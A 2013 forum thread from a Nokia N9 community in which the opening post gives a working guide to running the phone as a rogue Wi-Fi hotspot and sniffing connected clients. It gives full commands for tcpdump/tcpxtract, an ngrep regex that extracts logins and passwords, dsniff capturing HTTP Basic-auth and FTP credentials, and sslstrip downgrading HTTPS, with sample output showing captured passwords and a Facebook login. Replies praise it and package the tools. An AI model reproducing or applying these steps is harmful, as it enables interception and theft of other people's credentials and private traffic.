Active Topics

 



Notices
Reply
Thread Tools
dadaniel's Avatar
dadaniel is offline dadaniel
2013-01-31 , 23:42
Posts: 20 | Thanked: 46 times | Joined on Apr 2012 @ Austria
#1
the n9 as an evil access point #mitm



Prelude: I used it in all these tools for development and privat use, e.g. you shouldn't use it in a coffee-shop, call your hotspot "Free-Wifi" and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff ...

... my train of thought was - how can I sniff whatever it's transmitted through my stock wifi-hotspot (joikuspot) ...

... so here's a guideline of what I got working and how it works:

mitm

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:

opensh_1.00_armel
enable rzr’s repository (setup repository)
I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!

1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?

1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer - you can dump nearly all traffic with this tool ...

tcpxtract is a tool to rebuild data from tcpdump-pcap files...

let's install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8
I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb
now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80
# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don't convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client ... tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/
Found file of type "html" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type "png" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type "png" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type "png" in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

...

...

Found file of type "png" in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png
it looks like this.

I LIKE!


2. ngrep

ngrep is a very powerful tool as well - you can analyze traffic live...

I'm going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8
here's ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb
now fire up the wifi hotspot, connect with a client and let the magic begin [again ]:

/home/user/dev/sniffer # ngrep '[&\s?](?:login|user(?:name|)|p(***(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)' -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(***(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1
# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 ... from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

... What it doesn't do is capturing htaccess logins, I use dsniff for it.


3. dsniff

dsniff? - omg, it's awesome! it includes:

arpspoof - Send out unrequested (and possibly forged) arp replies.
dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here's dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb
whooop! - should be working now

dsniff itself is very simple to use - it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

-----------------
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

-----------------
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump
# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] ... again I got segment faults when listening on wlan0.


4. sslstrip?

sslstrip strips down your https connections to http ...

... I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection - I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode "manual") - deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn't use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won't show up in the properties of Joikuspot. - Maybe that's why it doesn't take the proxy settings from the APN ... anyway, I'm still working on a workaround!

Here's sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up...
/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode "manual"

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2 %B4%2C%E2%82%AC%2C
... I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it's not a very efficient and elegant way to work, so I won't explain it)

cheers!
__________________
------------------------------------------------------------------------------
-- www.true-binary.com
------------------------------------------------------------------------------
-- aptitude -vvvvvv moo
-- What is it? It's an elephant being eaten by a snake, of course.
------------------------------------------------------------------------------
Last edited by dadaniel; 2013-01-31 at 23:48.
 

The Following 19 Users Say Thank You to dadaniel For This Useful Post:
Arie is offline Arie
2013-02-01 , 04:20
Posts: 1,539 | Thanked: 1,604 times | Joined on Oct 2011 @ With my N9
#2
This is an awesome Post... Why are people overlooking it?
__________________
Arie|www.everythingn9.com|Nokia N9 64GB x2|Nokia N950

@everythingn9

Temporary Inception Fix

Times Banned from TMO: 4
 
dadaniel's Avatar
dadaniel is offline dadaniel
2013-02-01 , 09:43
Posts: 20 | Thanked: 46 times | Joined on Apr 2012 @ Austria
#3
Originally Posted by Arie View Post
This is an awesome Post... Why are people overlooking it?
thanks ... maybe because it's not an "app" :P
__________________
------------------------------------------------------------------------------
-- www.true-binary.com
------------------------------------------------------------------------------
-- aptitude -vvvvvv moo
-- What is it? It's an elephant being eaten by a snake, of course.
------------------------------------------------------------------------------
 

The Following User Says Thank You to dadaniel For This Useful Post:
soryuuha is offline soryuuha
2013-02-01 , 10:21
Posts: 771 | Thanked: 393 times | Joined on Feb 2012
#4
packet sniffer tool on n9 whoa :shock:

need to know if this will work on stock kernel :<
__________________
5800XMN8808N9
 
dadaniel's Avatar
dadaniel is offline dadaniel
2013-02-01 , 11:41
Posts: 20 | Thanked: 46 times | Joined on Apr 2012 @ Austria
#5
Originally Posted by soryuuha View Post
packet sniffer tool on n9 whoa :shock:

need to know if this will work on stock kernel :<
It 'should' work, but I would try it with inception/opensh - these tools don't need any kernel based modules.

Give it a try and tell me about it

cheers
__________________
------------------------------------------------------------------------------
-- www.true-binary.com
------------------------------------------------------------------------------
-- aptitude -vvvvvv moo
-- What is it? It's an elephant being eaten by a snake, of course.
------------------------------------------------------------------------------
 
kskoda is offline kskoda
2013-03-01 , 07:53
Posts: 20 | Thanked: 17 times | Joined on Nov 2011 @ Zagreb, Croatia
#6
Originally Posted by dadaniel View Post
[SIZE="4"]

All I did was to modify my APN connection - I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode "manual") - deactivate and activate the connection again and fire up sslstrip.
How did you activate proxy?
 
www.rzr.online.fr's Avatar
www.rzr.online.fr is offline www.rzr.online.fr
2013-03-01 , 08:06
Posts: 1,348 | Thanked: 1,863 times | Joined on Jan 2009 @ fr/35/rennes
#7
added dante and sslstrip to shared repo ... dsc link for others are welcome too
__________________
Current obsession:

https://purl.org/rzr/abandonware

Please help to list all maemo existing apps :

https://github.com/abandonware/aband...ment-578143760

https://wiki.maemo.org/Apps#

I am looking for " 4 inch TFT LCD display screen " for Nokia n950 HandSet

http://rzr.online.fr/q/lcd


Also, I need online storage to archive files :

http://db.tt/gn5Qffd6#

https://my.pcloud.com/#page=register...e=g8ikZmcfEJy#
Last edited by www.rzr.online.fr; 2013-03-01 at 20:47.
 
coderus's Avatar
coderus is offline coderus
2013-03-01 , 08:40
Posts: 6,436 | Thanked: 12,699 times | Joined on Nov 2011 @ Ängelholm, Sweden
#8
checked dante-client, not working. configured /etc/dante.conf, started socksify /usr/bin/grob -> process freezed and nothing happened
__________________
Telegram | Openrepos | GitHub | Revolut donations
 
www.rzr.online.fr's Avatar
www.rzr.online.fr is offline www.rzr.online.fr
2013-03-01 , 20:19
Posts: 1,348 | Thanked: 1,863 times | Joined on Jan 2009 @ fr/35/rennes
#9
thx for reporting ,feel free to branch it from obs and fix it

added dsniff among others ...

apt-get install tcpdump tcpxtract ngrep ssldump


Please check everything is there and confirm it is usable
__________________
Current obsession:

https://purl.org/rzr/abandonware

Please help to list all maemo existing apps :

https://github.com/abandonware/aband...ment-578143760

https://wiki.maemo.org/Apps#

I am looking for " 4 inch TFT LCD display screen " for Nokia n950 HandSet

http://rzr.online.fr/q/lcd


Also, I need online storage to archive files :

http://db.tt/gn5Qffd6#

https://my.pcloud.com/#page=register...e=g8ikZmcfEJy#
Last edited by www.rzr.online.fr; 2013-03-03 at 14:22.
 
Reply

« Previous Thread | Next Thread »

 
Forum Jump


All times are GMT. The time now is 14:01.

Contact Us - Home - Archive - Top